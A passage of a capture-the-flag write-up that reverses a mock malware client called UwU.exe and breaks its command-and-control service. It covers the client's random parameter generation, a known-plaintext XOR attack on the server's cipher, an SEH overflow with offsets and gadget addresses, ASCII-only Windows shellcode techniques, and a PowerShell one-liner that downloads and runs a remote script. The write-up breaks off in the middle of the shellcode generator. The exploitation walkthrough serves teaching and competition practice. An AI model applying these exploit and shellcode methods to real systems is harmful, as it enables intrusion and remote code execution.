      for ( j = 9; ; j = 1401 )
      {
        while ( j <= 18 )
        {
          if ( j == 18 )
          {
            v34 = mersenne_rng_with_b62(v44);   // generate b parameter
            sub_55757100(v34);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 4;
          }
          else if ( j == 4 )
          {
            v33 = mersenne_rng_with_b62(v44);   // generate c parameter
            sub_55757100(v33);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 64;
          }
          else
          {
            v30 = mersenne_rng_with_b62(v44);   // generate a parameter
            sub_55757100(v30);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 18;
          }
        }
        if ( j != 64 )
          break;
        v36 = mersenne_rng_with_b62(v44);       // generate d parameter
        sub_55757100(v36);
        if ( v46 >= 0x10 )
        {
          v31 = v44[0];
          v32 = v46 + 1;
          if ( v46 + 1 >= 0x1000 )
          {
            v31 = *(_DWORD *)(v44[0] - 4);
            v32 = v46 + 36;
            if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
              goto LABEL_66;
          }
          v40 = v32;
          sub_5575B048(v31);
        }
      }
      v35 = mersenne_rng_with_b62(v44);         // generate e parameter

Each parameter was 6 characters selected using a Mersenne Twister pseudo-random number generator algorithm from the base62 alphabet in the mersenne_rng_with_b62 function.

_DWORD *__usercall mersenne_rng_with_b62@<eax>(_DWORD *a1@<ecx>, int a2@<edi>, int a3@<esi>)
{
  _EXCEPTION_REGISTRATION_RECORD *v3; // eax
  void *v4; // esp
  unsigned int seed; // eax
  unsigned int i; // edx
  int v8; // edi
  int extracted_number; // eax
  unsigned int v10; // edx
  unsigned int v11; // ecx
  _DWORD *v12; // eax
  _BYTE *v13; // eax
  char v14; // cl
  int v17; // [esp+0h] [ebp-13CCh] BYREF
  int v18[1259]; // [esp+4h] [ebp-13C8h]
  int v19; // [esp+13B0h] [ebp-1Ch]
  int v20; // [esp+13B4h] [ebp-18h]
  char *base62_alphabet; // [esp+13B8h] [ebp-14h]
  int v22; // [esp+13BCh] [ebp-10h]
  _EXCEPTION_REGISTRATION_RECORD *v23; // [esp+13C0h] [ebp-Ch]
  char *v24; // [esp+13C4h] [ebp-8h]
  int v25; // [esp+13C8h] [ebp-4h]

  v25 = -1;
  v3 = NtCurrentTeb()->NtTib.ExceptionList;
  v24 = byte_5575CBE6;
  v23 = v3;
  v4 = alloca(5056);
  v18[1255] = (int)a1;
  v20 = 0;
  v18[1253] = 62;
  base62_alphabet = (char *)operator new(0x40u);
  v18[1254] = 63;
  v18[1249] = (int)base62_alphabet;
  strcpy(base62_alphabet, "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");// base62
  v25 = 1;
  seed = std::_Random_device(a2, a3);
  v18[1248] = -1;
  i = 1;
  v18[0] = seed;
  do                                            // Initialise the generator from a seed
  {
    seed = i + 1812433253 * (seed ^ (seed >> 30));// Initialise Mersenne Twister with constant 1812433253
    v18[i++] = seed;
  }
  while ( i < 0x270 );
  *a1 = 0;
  a1[4] = 0;
  a1[5] = 15;
  *(_BYTE *)a1 = 0;
  v17 = 624;
  a1[4] = 0;
  *(_BYTE *)a1 = 0;
  v20 = 1;
  v18[1256] = (int)&v17;
  v8 = 6;
  v18[1257] = 32;
  v18[1258] = -1;
  do
  {
    extracted_number = get_next_mod_62(62);     // Retrieve next Mersenne PRNG number mod 62
    v10 = a1[5];
    v11 = a1[4];
    LOBYTE(v22) = base62_alphabet[extracted_number];    // Used number as offset in base62 alphabet
    if ( v11 >= v10 )
    {
      LOBYTE(v19) = 0;
      sub_557595E0(v11, v19, v22);
    }
    else
    {
      a1[4] = v11 + 1;
      v12 = a1;
      if ( v10 >= 0x10 )
        v12 = (_DWORD *)*a1;
      v13 = (char *)v12 + v11;
      v14 = v22;
      v13[1] = 0;
      *v13 = v14;
    }
    --v8;
  }
  while ( v8 );
  sub_5575B048(base62_alphabet);
  return a1;
}

I recognised the Mersenne Twister due to the presence of constants such as 1812433253. At this point, I fell down another hilarious rabbit hole. Apparently, the constants used by the program's Mersenne Twister matched those used to encrypt several Japanese game files. This led me to a game modder's decryption script that included the following comment:

Gist Comment

UwU indeed. I burned a few more hours chasing this false lead due to my faith in a fellow man of culture. Ultimately, I decided that the program only used the Mersenne Twister to generate random characters and nothing more.
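
In effect, mersenne_rng_with_b62 boils down to something like the sketch below. CPython's random.Random is also a Mersenne Twister (MT19937), but its seeding and range reduction differ from the C++ runtime, so this shows the technique rather than reproducing the binary's exact outputs. The function name random_b62 is made up for illustration.

```python
import random

BASE62 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def random_b62(rng: random.Random, length: int = 6) -> str:
    """Pick `length` characters from the base62 alphabet using the given PRNG."""
    return "".join(BASE62[rng.randrange(62)] for _ in range(length))


# Seeded from OS entropy, loosely comparable to std::random_device in the binary
rng = random.Random()
params = {name: random_b62(rng) for name in "abcde"}
print(params)
```

Nothing here depends on a secret, which fits the conclusion that the parameters were plain random filler.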

Since these values were indeed (pseudo)randomly generated, perhaps they served as an encryption key for future communications with the server, a common pattern used by C2 frameworks. I tried base62-decoding the parameters but only got gibberish. Next, I recalled that the dashboard on the website provided five master UwUIDs:

Here is a list of Bot Master UwUIDs:
- 715cf1a6-c0de-4a55-b055-c0ffeec0ffee
- 715cf1a6-baba-4a55-b0b0-c0ffeec0ffee
- 715cf1a6-510b-4a55-ba11-c0ffeec0ffee
- 715cf1a6-dead-4a55-a1d5-c0ffeec0ffee
- 715cf1a6-51de-4a55-be11-c0ffeec0ffee

However, these UwUIDs looked different from the UwUID returned from the registration HTTP request, such as oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma. This base64 string decoded to 36 bytes, the same number of bytes as the Bot Master UwUIDs in plaintext.
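
The length comparison is quick to reproduce. The value is URL-decoded first, because %2b stands for a literal + in the base64 text.

```python
import base64
from urllib.parse import unquote

encoded = "oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma"
master = "715cf1a6-c0de-4a55-b055-c0ffeec0ffee"

raw = base64.b64decode(unquote(encoded))

print(len(raw), len(master))
print(raw.hex())
```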

Perhaps the base64 string was simply an encoded version of a plaintext UwUID matching the pattern <4 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<6 HEX BYTES>. How could I decrypt them though?

I began fuzzing the POST /register.php request with different parameters. I noticed after a while that if I kept the parameters the same but kept repeating the request, I would eventually get the same encrypted UwUID again. Furthermore, after fuzzing too many times, I somehow crashed the encrypted UwUID generator (the organisers had to reset it) and began receiving only MDAwMDA=, which base64-decoded to 00000.

After many failed attempts, I began to wonder if I missed some crucial information. Since I downloaded the binary from http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/UwU.exe, I began fuzzing http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/<FUZZ>. As it turned out, http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/ was a simple directory listing that included README.txt.

Directory Listing

I opened the README and found out what I had been missing.

Congratulations, PALINDROME Member! You are now a proud UwUser of our latest malware, UwU.exe!

Before running the malware on your victim, it is important that the victim is a soft target. Ie, the win10 exploit mitigations should be disabled first (see https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#table-2configurable-windows-10-mitigations-designed-to-help-protect-against-memory-exploits). Win 8.1 and below are all fair game!

Upon running the malware, you will see several options. Namely:

  1. Register Bird

  2. Send Message

  3. Receive Messages

  4. Display Killswitch

  5. Exit

You should first register the malware (the Bird) with the C2 Server (the Birdwatcher), which is a server such as this one.

After that, you can send and receive messages, to communicate with the other registered Birds! Simply send the message to their UwUIDs (which will be assigned to you upon registering).

Each C2 Server will have several Big Birds as bot masters, which are essentially an identical copy of the malware you've received, but with a special killswitch only available for the Big Birds.

Also, you do not need to worry if the bot masters are taken offline. They will restart and reconnect to the C2 Server automatically!

This clarified things for me. I could contact the bot masters by sending them a message, so perhaps I could send some kind of payload to gain control of them. I set up my own fake C2 server in Python to test this theory.

from http.server import HTTPServer, BaseHTTPRequestHandler
from struct import pack

# from http.server import SimpleHTTPRequestHandler
import datetime

port = 8081

payload = b'A' * 2000

class myHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

        # Send the html message
        if self.path == '/register.php':
            # self.wfile.write(b'A' * 100000)
            self.wfile.write(
                b'40K8avCKsxKhO6OJ4Am4bq3bqEW6PvfG5hfpPKLeskDqZPHc')
        elif self.path == '/receive.php':
            self.wfile.write(payload)
        return


class StoppableHTTPServer(HTTPServer):
    def run(self):
        try:
            self.serve_forever()
        except KeyboardInterrupt:
            pass
        finally:
            # Clean-up server (close socket, etc.)
            self.server_close()


if __name__ == '__main__':
    server = HTTPServer(('127.0.0.1', 8081), myHandler)
    server.serve_forever()

I started the server and began receiving messages from my local UwU.exe. However, nothing happened. Wireshark told me that the messages were received by UwU.exe, but for some reason it did not parse them. By debugging the program and reviewing the “Receive Messages” function in IDA, I discovered that it performed the following check after receiving the message:

    if ( (_DWORD)v82 != 3
      || ((v46 = v6->m128i_i8[0] < 0x55u, v6->m128i_i8[0] != 85)    // Check if first character is U
       || (second_char = v6->m128i_i8[1], v46 = (unsigned __int8)second_char < 0x77u, second_char != 119)   // Check if second character is w
       || (third_char = v6->m128i_i8[2], v46 = (unsigned __int8)third_char < 0x55u, third_char != 85) ? (v49 = v46 ? -1 : 1) : (v49 = 0),   // Check if third character is U
          is_valid_message = 1,
          v49) )
    {
      is_valid_message = 0;
    }
    if ( HIDWORD(v82) >= 0x10 )
    {
      v50 = HIDWORD(v82) + 1;
      if ( (unsigned int)(HIDWORD(v82) + 1) >= 0x1000 )
      {
        v18 = *(_DWORD *)(v81.m128i_i32[0] - 4);
        v50 = HIDWORD(v82) + 36;
        if ( v81.m128i_i32[0] - v18 - 4 > 0x1F )
          goto LABEL_141;
      }
      v66 = (__m128i *)v50;
      sub_5575B048(v18);
    }
    if ( is_valid_message )
    {
      <COPY RESPONSE DATA TO BUFFER>

This meant that the message had to match the format UwU<MESSAGE>. I corrected my server code and tried again. This time, I got a crash:

(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify timestamp for C:\Users\Eugene\Desktop\tisc\10\UwU_unpacked.exe
eax=41414141 ebx=004854a0 ecx=41414141 edx=41414142 esi=0019fcb4 edi=000001ff
eip=55752d5a esp=0019fc80 ebp=0019fcac iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
UwU_unpacked+0x2d5a:
55752d5a 8b49fc          mov     ecx,dword ptr [ecx-4] ds:002b:4141413d=????????
0:000> !exchain
0019fca0: 41414141
Invalid exception stack at 41414141
0:000> g
(3978.edc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=773985f0 esi=00000000 edi=00000000
eip=41414141 esp=0019f648 ebp=0019f668 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

I had triggered an SEH overflow, one of the easiest overflows to exploit. To add to my excitement, I determined that UwU.exe did not include any memory protections like DEP or ASLR thanks to the MPRESS packer. I easily generated a local proof-of-concept to execute Meterpreter shellcode via the overflow in the message. First, I determined that the offset to the overwritten SEH address was 36. Next, I used a simple POP POP RET payload with a JMP 0x08 instruction to get to my shellcode, just like in the basic tutorials. However, it was never going to be that easy. Even though the exploit worked locally, when I sent this to the bot master UwUIDs using the POST /send.php endpoint, nothing happened.
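
The layout of such a message can be sketched as follows. Several details are assumptions rather than facts from the binary: that the offset of 36 is counted from the start of the message including the UwU prefix, that the next-SEH field sits directly before the handler pointer, and that the filler and padding bytes do not matter. The shellcode is a harmless placeholder.

```python
from struct import pack

SEH_OFFSET = 36           # offset of the overwritten handler pointer (from the post)
POP_POP_RET = 0x55758B55  # POP POP RET address used in the first draft
PREFIX = b"UwU"           # required by the client's validity check


def build_seh_message(shellcode: bytes) -> bytes:
    """Lay out filler, the next-SEH jump, the handler pointer and the shellcode."""
    nseh_offset = SEH_OFFSET - 4  # assumption: nSEH directly precedes the handler
    msg = PREFIX + b"A" * (nseh_offset - len(PREFIX))
    msg += b"\xeb\x06\x90\x90"      # nSEH: short jump over the handler pointer
    msg += pack("<I", POP_POP_RET)  # handler: returns into the nSEH field
    msg += shellcode
    return msg


placeholder = b"\xcc" * 8  # int3 instructions standing in for real shellcode
message = build_seh_message(placeholder)
print(message.hex())
```

The two-byte jump plus its displacement of 6 lands exactly 8 bytes after the start of the nSEH field, which is the first byte after the handler pointer.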

After several more angst-filled hours and confirming with the organisers that the network was working properly, I decided that this was a dead end. The C2 endpoint seemed to be filtering my payloads but I could not find out how it was doing so unless I sent messages to my own instances using the real C2. That required an unencrypted UwUID.

I recalled that the base64-decoded encrypted UwUID had the same number of bytes as the unencrypted plaintext bot master UwUIDs: 36. This suggested that the C2 used a stream cipher because stream ciphers generate the ciphertext by XORing each byte of the plaintext against a keystream, creating a ciphertext of the same length as the plaintext. If the C2 used a block cipher like AES, the plaintext would be padded to the block size length before being encrypted, causing the length of the ciphertext to be greater than the length of the plaintext.
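
The length argument is simple arithmetic. The sketch assumes a 16-byte block size and PKCS#7 padding for the block cipher case. A block cipher run in a streaming mode such as CTR would not pad, so the matching length is a strong hint, not proof.

```python
def stream_cipher_len(plaintext_len: int) -> int:
    """A stream cipher XORs byte for byte, so the length is unchanged."""
    return plaintext_len


def block_cipher_len(plaintext_len: int, block_size: int = 16) -> int:
    """PKCS#7 always appends between 1 and block_size bytes of padding."""
    return (plaintext_len // block_size + 1) * block_size


uwuid_len = len("715cf1a6-c0de-4a55-b055-c0ffeec0ffee")
print(uwuid_len, stream_cipher_len(uwuid_len), block_cipher_len(uwuid_len))
```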

I began researching various ways to break stream ciphers from a black box perspective. Once again, Stack Overflow came to my rescue. One of the answers described a known-plaintext attack against RC4. If the encryption service used the same key each time it encrypted something, the keystream would be the same for all inputs. Since each ciphertext was simply the plaintext XOR keystream, I could retrieve the XOR of two plaintexts by XORing their ciphertexts.

KS = RC4(K)
C1 = KS XOR M1
C2 = KS XOR M2
C1 XOR C2 = (KS XOR M1) XOR (KS XOR M2) = M1 XOR M2

I tried this out by registering twice with the same parameters to get two different ciphertexts. For example, with a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk, I got oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma and iVrBK8DOiQrbesHIjhTCf8LMkgHDe8bVhw+TcMGb3AqSL8Wd. Next, I base64-decoded them and XORed them together. This returned the plaintext (.D6<.(.D6<.(.D6<.(.D6<.(.D6<.(.D6<. which was a repeating series of 6 bytes:

28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07 
28 0e 44 36 3c 07

What did this mean? Since the randomly-generated parameters made up 6 bytes each, I decided to try XORing this output again with each of the parameters. Voila: the mysterious 6 bytes were simply pFvulv (parameter c) XORed with XH2CPq (parameter d). This meant that the C2 cipher randomly selected one of the parameters at registration and repeated it 6 times to create the plaintext.
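
This check can be reproduced from the values quoted in this post. The sketch XORs the two decoded ciphertexts, confirms that the result is one 6-byte block repeated six times, and reports which pair of submitted parameter values XOR to that block.

```python
import base64
from itertools import combinations


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


params = {"a": b"roVwGx", "b": b"gD4ZuM", "c": b"pFvulv", "d": b"XH2CPq", "e": b"I3Yonk"}
c1 = base64.b64decode("oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma")
c2 = base64.b64decode("iVrBK8DOiQrbesHIjhTCf8LMkgHDe8bVhw+TcMGb3AqSL8Wd")

diff = xor(c1, c2)  # the keystream cancels out, leaving M1 XOR M2
block = diff[:6]
repeats = diff == block * 6

# Which two parameter values XOR to the repeating block?
matches = [
    (p, q) for p, q in combinations(params, 2)
    if xor(params[p], params[q]) == block
]

print(block.hex(" "), repeats, matches)
```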

However, while this explained why the encrypted UwUIDs repeated over time, this looked nothing like a plaintext UwUID. I also retrieved the keystream by XORing the plaintexts with their respective ciphertexts but did not get anything interesting.

Thinking further, I recalled an interesting observation from when I crashed the C2 encrypting function. While I was waiting for the organisers to fix the problem, I tried registering from a remote DigitalOcean Droplet instance and successfully retrieved valid encrypted UwUIDs even though I was unable to do so from my home network. This suggested that the encryption relied on the IP address. I logged into the remote instance and tried generating encrypted UwUIDs with the exact same parameters I had been using. It returned encrypted UwUIDs that were completely different from the ones I had generated from my home network, confirming the IP address hunch. I repeated the same process to retrieve the keystream and compared it to the keystream for my home network.

Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec

I noticed that some bytes matched at the same positions in both keystreams. Most of these were in the same positions as the dash characters in the unencrypted master UwUIDs.

Keystream 1: d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8
Keystream 2: d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec
MasterUwUID: 7  1  5  c  f  1  a  6  -  5  1  d  e  -  4  a  5  5  -  b  e  1  1  -  c  0  f  f  e  e  c  0  f  f  e  e

This strongly signalled that a double-layer known-plaintext attack was at work. The keystream specific to each IP address used to encrypt the random 6-character parameter values was itself a ciphertext generated by XORing the plaintext UwUID belonging to the IP address with a master keystream. Since all plaintext UwUIDs had dash characters in the same positions, their IP address-specific keystreams would also have the same XOR result in those positions.

MASTER_KS = RC4(MASTER_K)
KS1 = MASTER_KS XOR UWUID1
KS2 = MASTER_KS XOR UWUID2
C1 = KS1 XOR RANDOMLY_SELECTED_PARAMETER_VALUE1
C2 = KS2 XOR RANDOMLY_SELECTED_PARAMETER_VALUE2
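
The positional overlap is easy to confirm with the two keystreams listed above. The sketch lists the indices where they agree and compares them with the dash positions of a master UwUID.

```python
ks1 = bytes.fromhex(
    "d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 "
    "ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8"
)
ks2 = bytes.fromhex(
    "d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd "
    "ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec"
)
master_uwuid = "715cf1a6-51de-4a55-be11-c0ffeec0ffee"

# Indices where both keystreams hold the same byte
same = [i for i, (x, y) in enumerate(zip(ks1, ks2)) if x == y]
# Indices of the dashes in any UwUID
dashes = [i for i, ch in enumerate(master_uwuid) if ch == "-"]

print("matching positions:", same)
print("dash positions:    ", dashes)
```

Every dash position appears among the matches. The other matches are positions where the two underlying UwUIDs happen to share a character.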

This explained why when I sent the same parameter values from different IP addresses, their encrypted UwUIDs never matched. But how could I retrieve the master keystream? Other than the dashes, I knew that the plaintext UwUIDs were hexadecimal number characters, i.e. 0-9a-f. With enough individual keystream samples, I could brute force all possible master keystream bytes and select the right one based on whether the candidate byte at position x XORed with all of the keystreams' bytes at position x always returned a byte in the range ASCII 0-9a-f.

Using my favourite VPN, NordVPN, I set to work. I generated and retrieved 13 different keystreams from 13 different IP addresses, then used the CyberChef XOR brute force filter to manually check which byte matched. Byte by byte, the keystream emerged. Fortunately, I realised that the master keystream was actually a series of 6 repeating bytes, e7 71 c4 0a a5 89. Next, I XORed the individual keystreams against the master keystream. To my delight, this resulted in legitimate plaintext UwUIDs.
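
The manual CyberChef work could be scripted roughly as below. It uses only the two keystreams printed earlier, so several candidate bytes survive at most positions; with 13 samples the candidate lists shrink further. The function names are illustrative.

```python
from itertools import cycle

ALLOWED = set(b"0123456789abcdef-")  # characters a plaintext UwUID may contain
KS1 = bytes.fromhex(
    "d5 10 a7 32 c3 bd d1 46 e9 68 96 bc d0 5c f0 69 93 b9 "
    "ca 48 f6 6e 96 a4 84 43 f2 3f 9d e8 d7 12 a6 6e 95 e8"
)
KS2 = bytes.fromhex(
    "d1 12 f3 68 90 bf d1 42 e9 39 91 b9 d6 5c f0 3c 92 bd "
    "ca 49 f1 38 96 a4 df 47 a1 33 91 ea 84 42 a0 6c 95 ec"
)
MASTER = bytes.fromhex("e7 71 c4 0a a5 89")  # repeating master keystream from the post


def candidates(samples, pos):
    """Key bytes that map every sample's byte at `pos` to a hex digit or dash."""
    return [k for k in range(256) if all((s[pos] ^ k) in ALLOWED for s in samples)]


def recover_uwuid(keystream: bytes, master: bytes = MASTER) -> str:
    """XOR an IP-specific keystream with the repeating master keystream."""
    return bytes(k ^ m for k, m in zip(keystream, cycle(master))).decode("ascii")


remaining = [len(candidates([KS1, KS2], i)) for i in range(36)]
print(remaining)
print(recover_uwuid(KS1))
print(recover_uwuid(KS2))
```

Both recovered strings follow the 8-4-4-4-12 layout of the bot master UwUIDs, which is a useful sanity check on the master keystream.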

With the plaintext UwUID for my IP address, I sent a message using the POST /send.php endpoint, then checked the POST /receive.php endpoint with the encrypted UwUID. The message came through! Now, I could finally figure out why my payloads weren't working. Immediately, I realised that any payload above a certain length resulted in an empty message. I gradually narrowed down the maximum length to 328. Additionally, the first 32 bytes were rewritten to UwUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU. Finally, there were a few bad characters like \x25\x26\x2b. Fortunately, this seemed pretty manageable.

Or so I thought. Not long after, I received a notification from the organisers that they had fixed a bug in the servers. When I retried the receive endpoints, I realised that the number of bad bytes had increased enormously: any byte from \x80 onwards was nulled out. In other words, I had to write ASCII-only shellcode.
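
With this many restrictions, a small checker saves a lot of round trips to the server. The sketch below encodes the constraints described so far. The bad-character set contains only the three examples named above, and whether the 328-byte limit counts the rewritten prefix is an assumption.

```python
MAX_LEN = 328                   # longest message that was not emptied
BAD_CHARS = {0x25, 0x26, 0x2B}  # '%', '&', '+' (examples given; list may be incomplete)
REWRITTEN_PREFIX = 32           # first 32 bytes are overwritten by the server


def problems(message: bytes) -> list:
    """Return human-readable reasons why the server would mangle the message."""
    found = []
    if len(message) > MAX_LEN:
        found.append(f"too long: {len(message)} > {MAX_LEN}")
    for offset, byte in enumerate(message):
        if offset < REWRITTEN_PREFIX:
            continue  # overwritten anyway, so the content is irrelevant
        if byte >= 0x80:
            found.append(f"non-ASCII byte {byte:#04x} at offset {offset}")
        elif byte in BAD_CHARS:
            found.append(f"bad character {byte:#04x} at offset {offset}")
    return found


print(problems(b"UwU" + b"U" * 29 + b"\x79\x06AA"))  # ASCII-only: no problems
print(problems(b"UwU" + b"U" * 29 + b"\xeb\x06AA"))  # the original short JMP
```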

While I was fairly comfortable with writing Windows shellcode thanks to the Offensive Security Exploit Developer (OSED) course, I had never faced such severe restrictions before. There were a few writeups on ASCII-only Linux shellcode online but I could not find one for Windows that matched my length requirements.

After the initial panic, I settled on my plan of action. First, I noticed that UwU.exe imported GetProcAddress and GetModuleHandleW, so I could dereference those functions from fixed addresses in the Import Address Table of the executable (remember there were no memory protections like ASLR) and use them to retrieve the address of WinExec from Kernel32. Afterwards, I could call WinExec with my desired commands. To build my shellcode, I heavily modified a Windows shellcode generation script I had previously used for OSED. After doing some research, I also found a useful Linux ASCII shellcode writeup that highlighted several useful gadgets:

# h4W1P - push   0x50315734                # + pop eax -> set eax
# 5xxxx - xor    eax, xxxx                 # use xor to generate string
# j1X41 - eax <- 0                         # clear eax
# 1B2   - xor    DWORD PTR [edx+0x32], eax # assign value to shellcode
# 2J2   - xor    cl, BYTE PTR [edx+0x32]   # nop
# 41    - xor al, 0x31                     # nop
# X     - pop    eax
# P     - push   eax

In particular, I could use xor DWORD PTR [edx+0x32], eax to decode non-ASCII instructions when I could not find a suitable ASCII replacement.
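
The idea behind the decoder gadget can be modelled in a few lines. The sketch assumes eax holds 0x80 at run time, which is the value this post's shellcode loads for its fix-ups. Each non-ASCII byte is stored with its high bit cleared and an xor at the matching offset restores it. The helper names are made up for illustration.

```python
def ascii_encode(code: bytes):
    """Clear the high bit of every non-ASCII byte and record where it was set."""
    encoded = bytearray(code)
    fixups = []
    for offset, byte in enumerate(code):
        if byte >= 0x80:
            encoded[offset] = byte ^ 0x80
            fixups.append(offset)
    return bytes(encoded), fixups


def apply_fixups(encoded: bytes, fixups) -> bytes:
    """Model what `xor dword ptr [edx+offset], eax` does when eax is 0x80."""
    decoded = bytearray(encoded)
    for offset in fixups:
        decoded[offset] ^= 0x80  # only the lowest byte of the dword changes
    return bytes(decoded)


call_edi = b"\xff\xd7"  # call edi
stored, offsets = ascii_encode(call_edi)
print(stored.hex(), offsets)
print(apply_fixups(stored, offsets).hex())
```

Each fix-up costs one extra instruction, so every non-ASCII byte that can be replaced by a native ASCII instruction frees up space. A byte of exactly 0x80 would encode to a null byte, so this trick would not cover that case.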

Finally, I found the smallest null-free WinExec shellcode to use as a reference.

With these tools in hand, I began to craft my shellcode. Starting from the top, I replaced my original POP POP RET pointer 0x55758b55 with 0x55756e78, which pointed to pop ebx ; pop ebp ; retn 0x0004, to meet the ASCII character requirements. I also replaced the non-ASCII JMP 0x8 (eb 06) with the ASCII-only JNS 0x8 (79 06). Afterwards, I used the xor DWORD PTR [edx+0x32], eax decoder gadget for my shellcode. My first draft relied heavily on this gadget and did not replace many non-ASCII instructions. I also originally tried to use GetModuleHandleW and GetProcAddress to resolve the address of WinExec. However, for some reason or another, GetProcAddress did not work at all even though GetModuleHandleW worked perfectly. I suspected that this was some strange wide string versus regular string bug but could not fix it even after debugging with GetLastError. It could also have been due to Import Address Filtering protections but I could not confirm if that flag was turned on.

Giving up on GetProcAddress, I decided to pass the base address of Kernel32 I had retrieved with GetModuleHandleW to the function search loop used in my reference shellcode. With lots of effort, I eventually got my patchwork payload to work and execute a simple calc. Next, I modified it to powershell iex $(irm http://<IP ADDRESS>) to download and execute a remote PowerShell script. Although this worked on my local instances, it failed when I tried it on the master UwUIDs, an increasingly common pattern. As I was working without any visibility of the bot masters, I faced huge difficulties trying to figure out why it was failing. After hours of frustration, I decided to focus on cleaning up my shellcode, since the messy shellcode might have been causing the problems.

Firstly, my over-reliance on the decoding gadget created lots of unnecessary instructions, reducing the number of bytes available for my WinExec command. I bit the bullet and tried to convert some of the encoded bytes to true ASCII shellcode. I discovered a few useful gadgets to replace these instructions with their ASCII equivalents.

Non-ASCII Bytes | Non-ASCII Instructions                | ASCII Bytes    | ASCII Instructions
01 fe           | add esi, edi;                         | 57 03 34 24    | push edi; add esi, DWORD PTR [esp];
8b 74 1f 1c     | mov esi, DWORD PTR [edi+ebx*1+0x1c];  | 5e 33 74 1f 1c | pop esi; xor esi, DWORD PTR [edi+ebx*1+0x1c];
31 db           | xor ebx, ebx;                         | 53 33 1c 24    | push ebx; xor ebx, DWORD PTR [esp];

The only non-ASCII instructions I could not replace were the CALL and negative short JMP instructions, so I continued to rely on the decoder gadget for those. Thanks to these optimisations, I cut two-thirds of the decoder gadgets and freed up 40 bytes, a fortune in shellcode. I now had 76 bytes for my command argument. I also patched a bug where Windows 7 needed a valid uCmdShow argument for WinExec, whereas Windows 8 and 10 gracefully dealt with any invalid uCmdShow arguments. My new and improved shellcode worked much more reliably.

#!/usr/bin/python3
import argparse
import keystone as ks
from struct import pack

def to_hex(s):
    retval = list()
    for char in s:
        retval.append(hex(ord(char)).replace("0x", ""))
    return "".join(retval)


def push_string(input_string):
    rev_hex_payload = str(to_hex(input_string))
    rev_hex_payload_len = len(rev_hex_payload)

    instructions = []
    first_instructions = []
    null_terminated = False
    for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the leftover characters that do not fill a whole dword
        elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
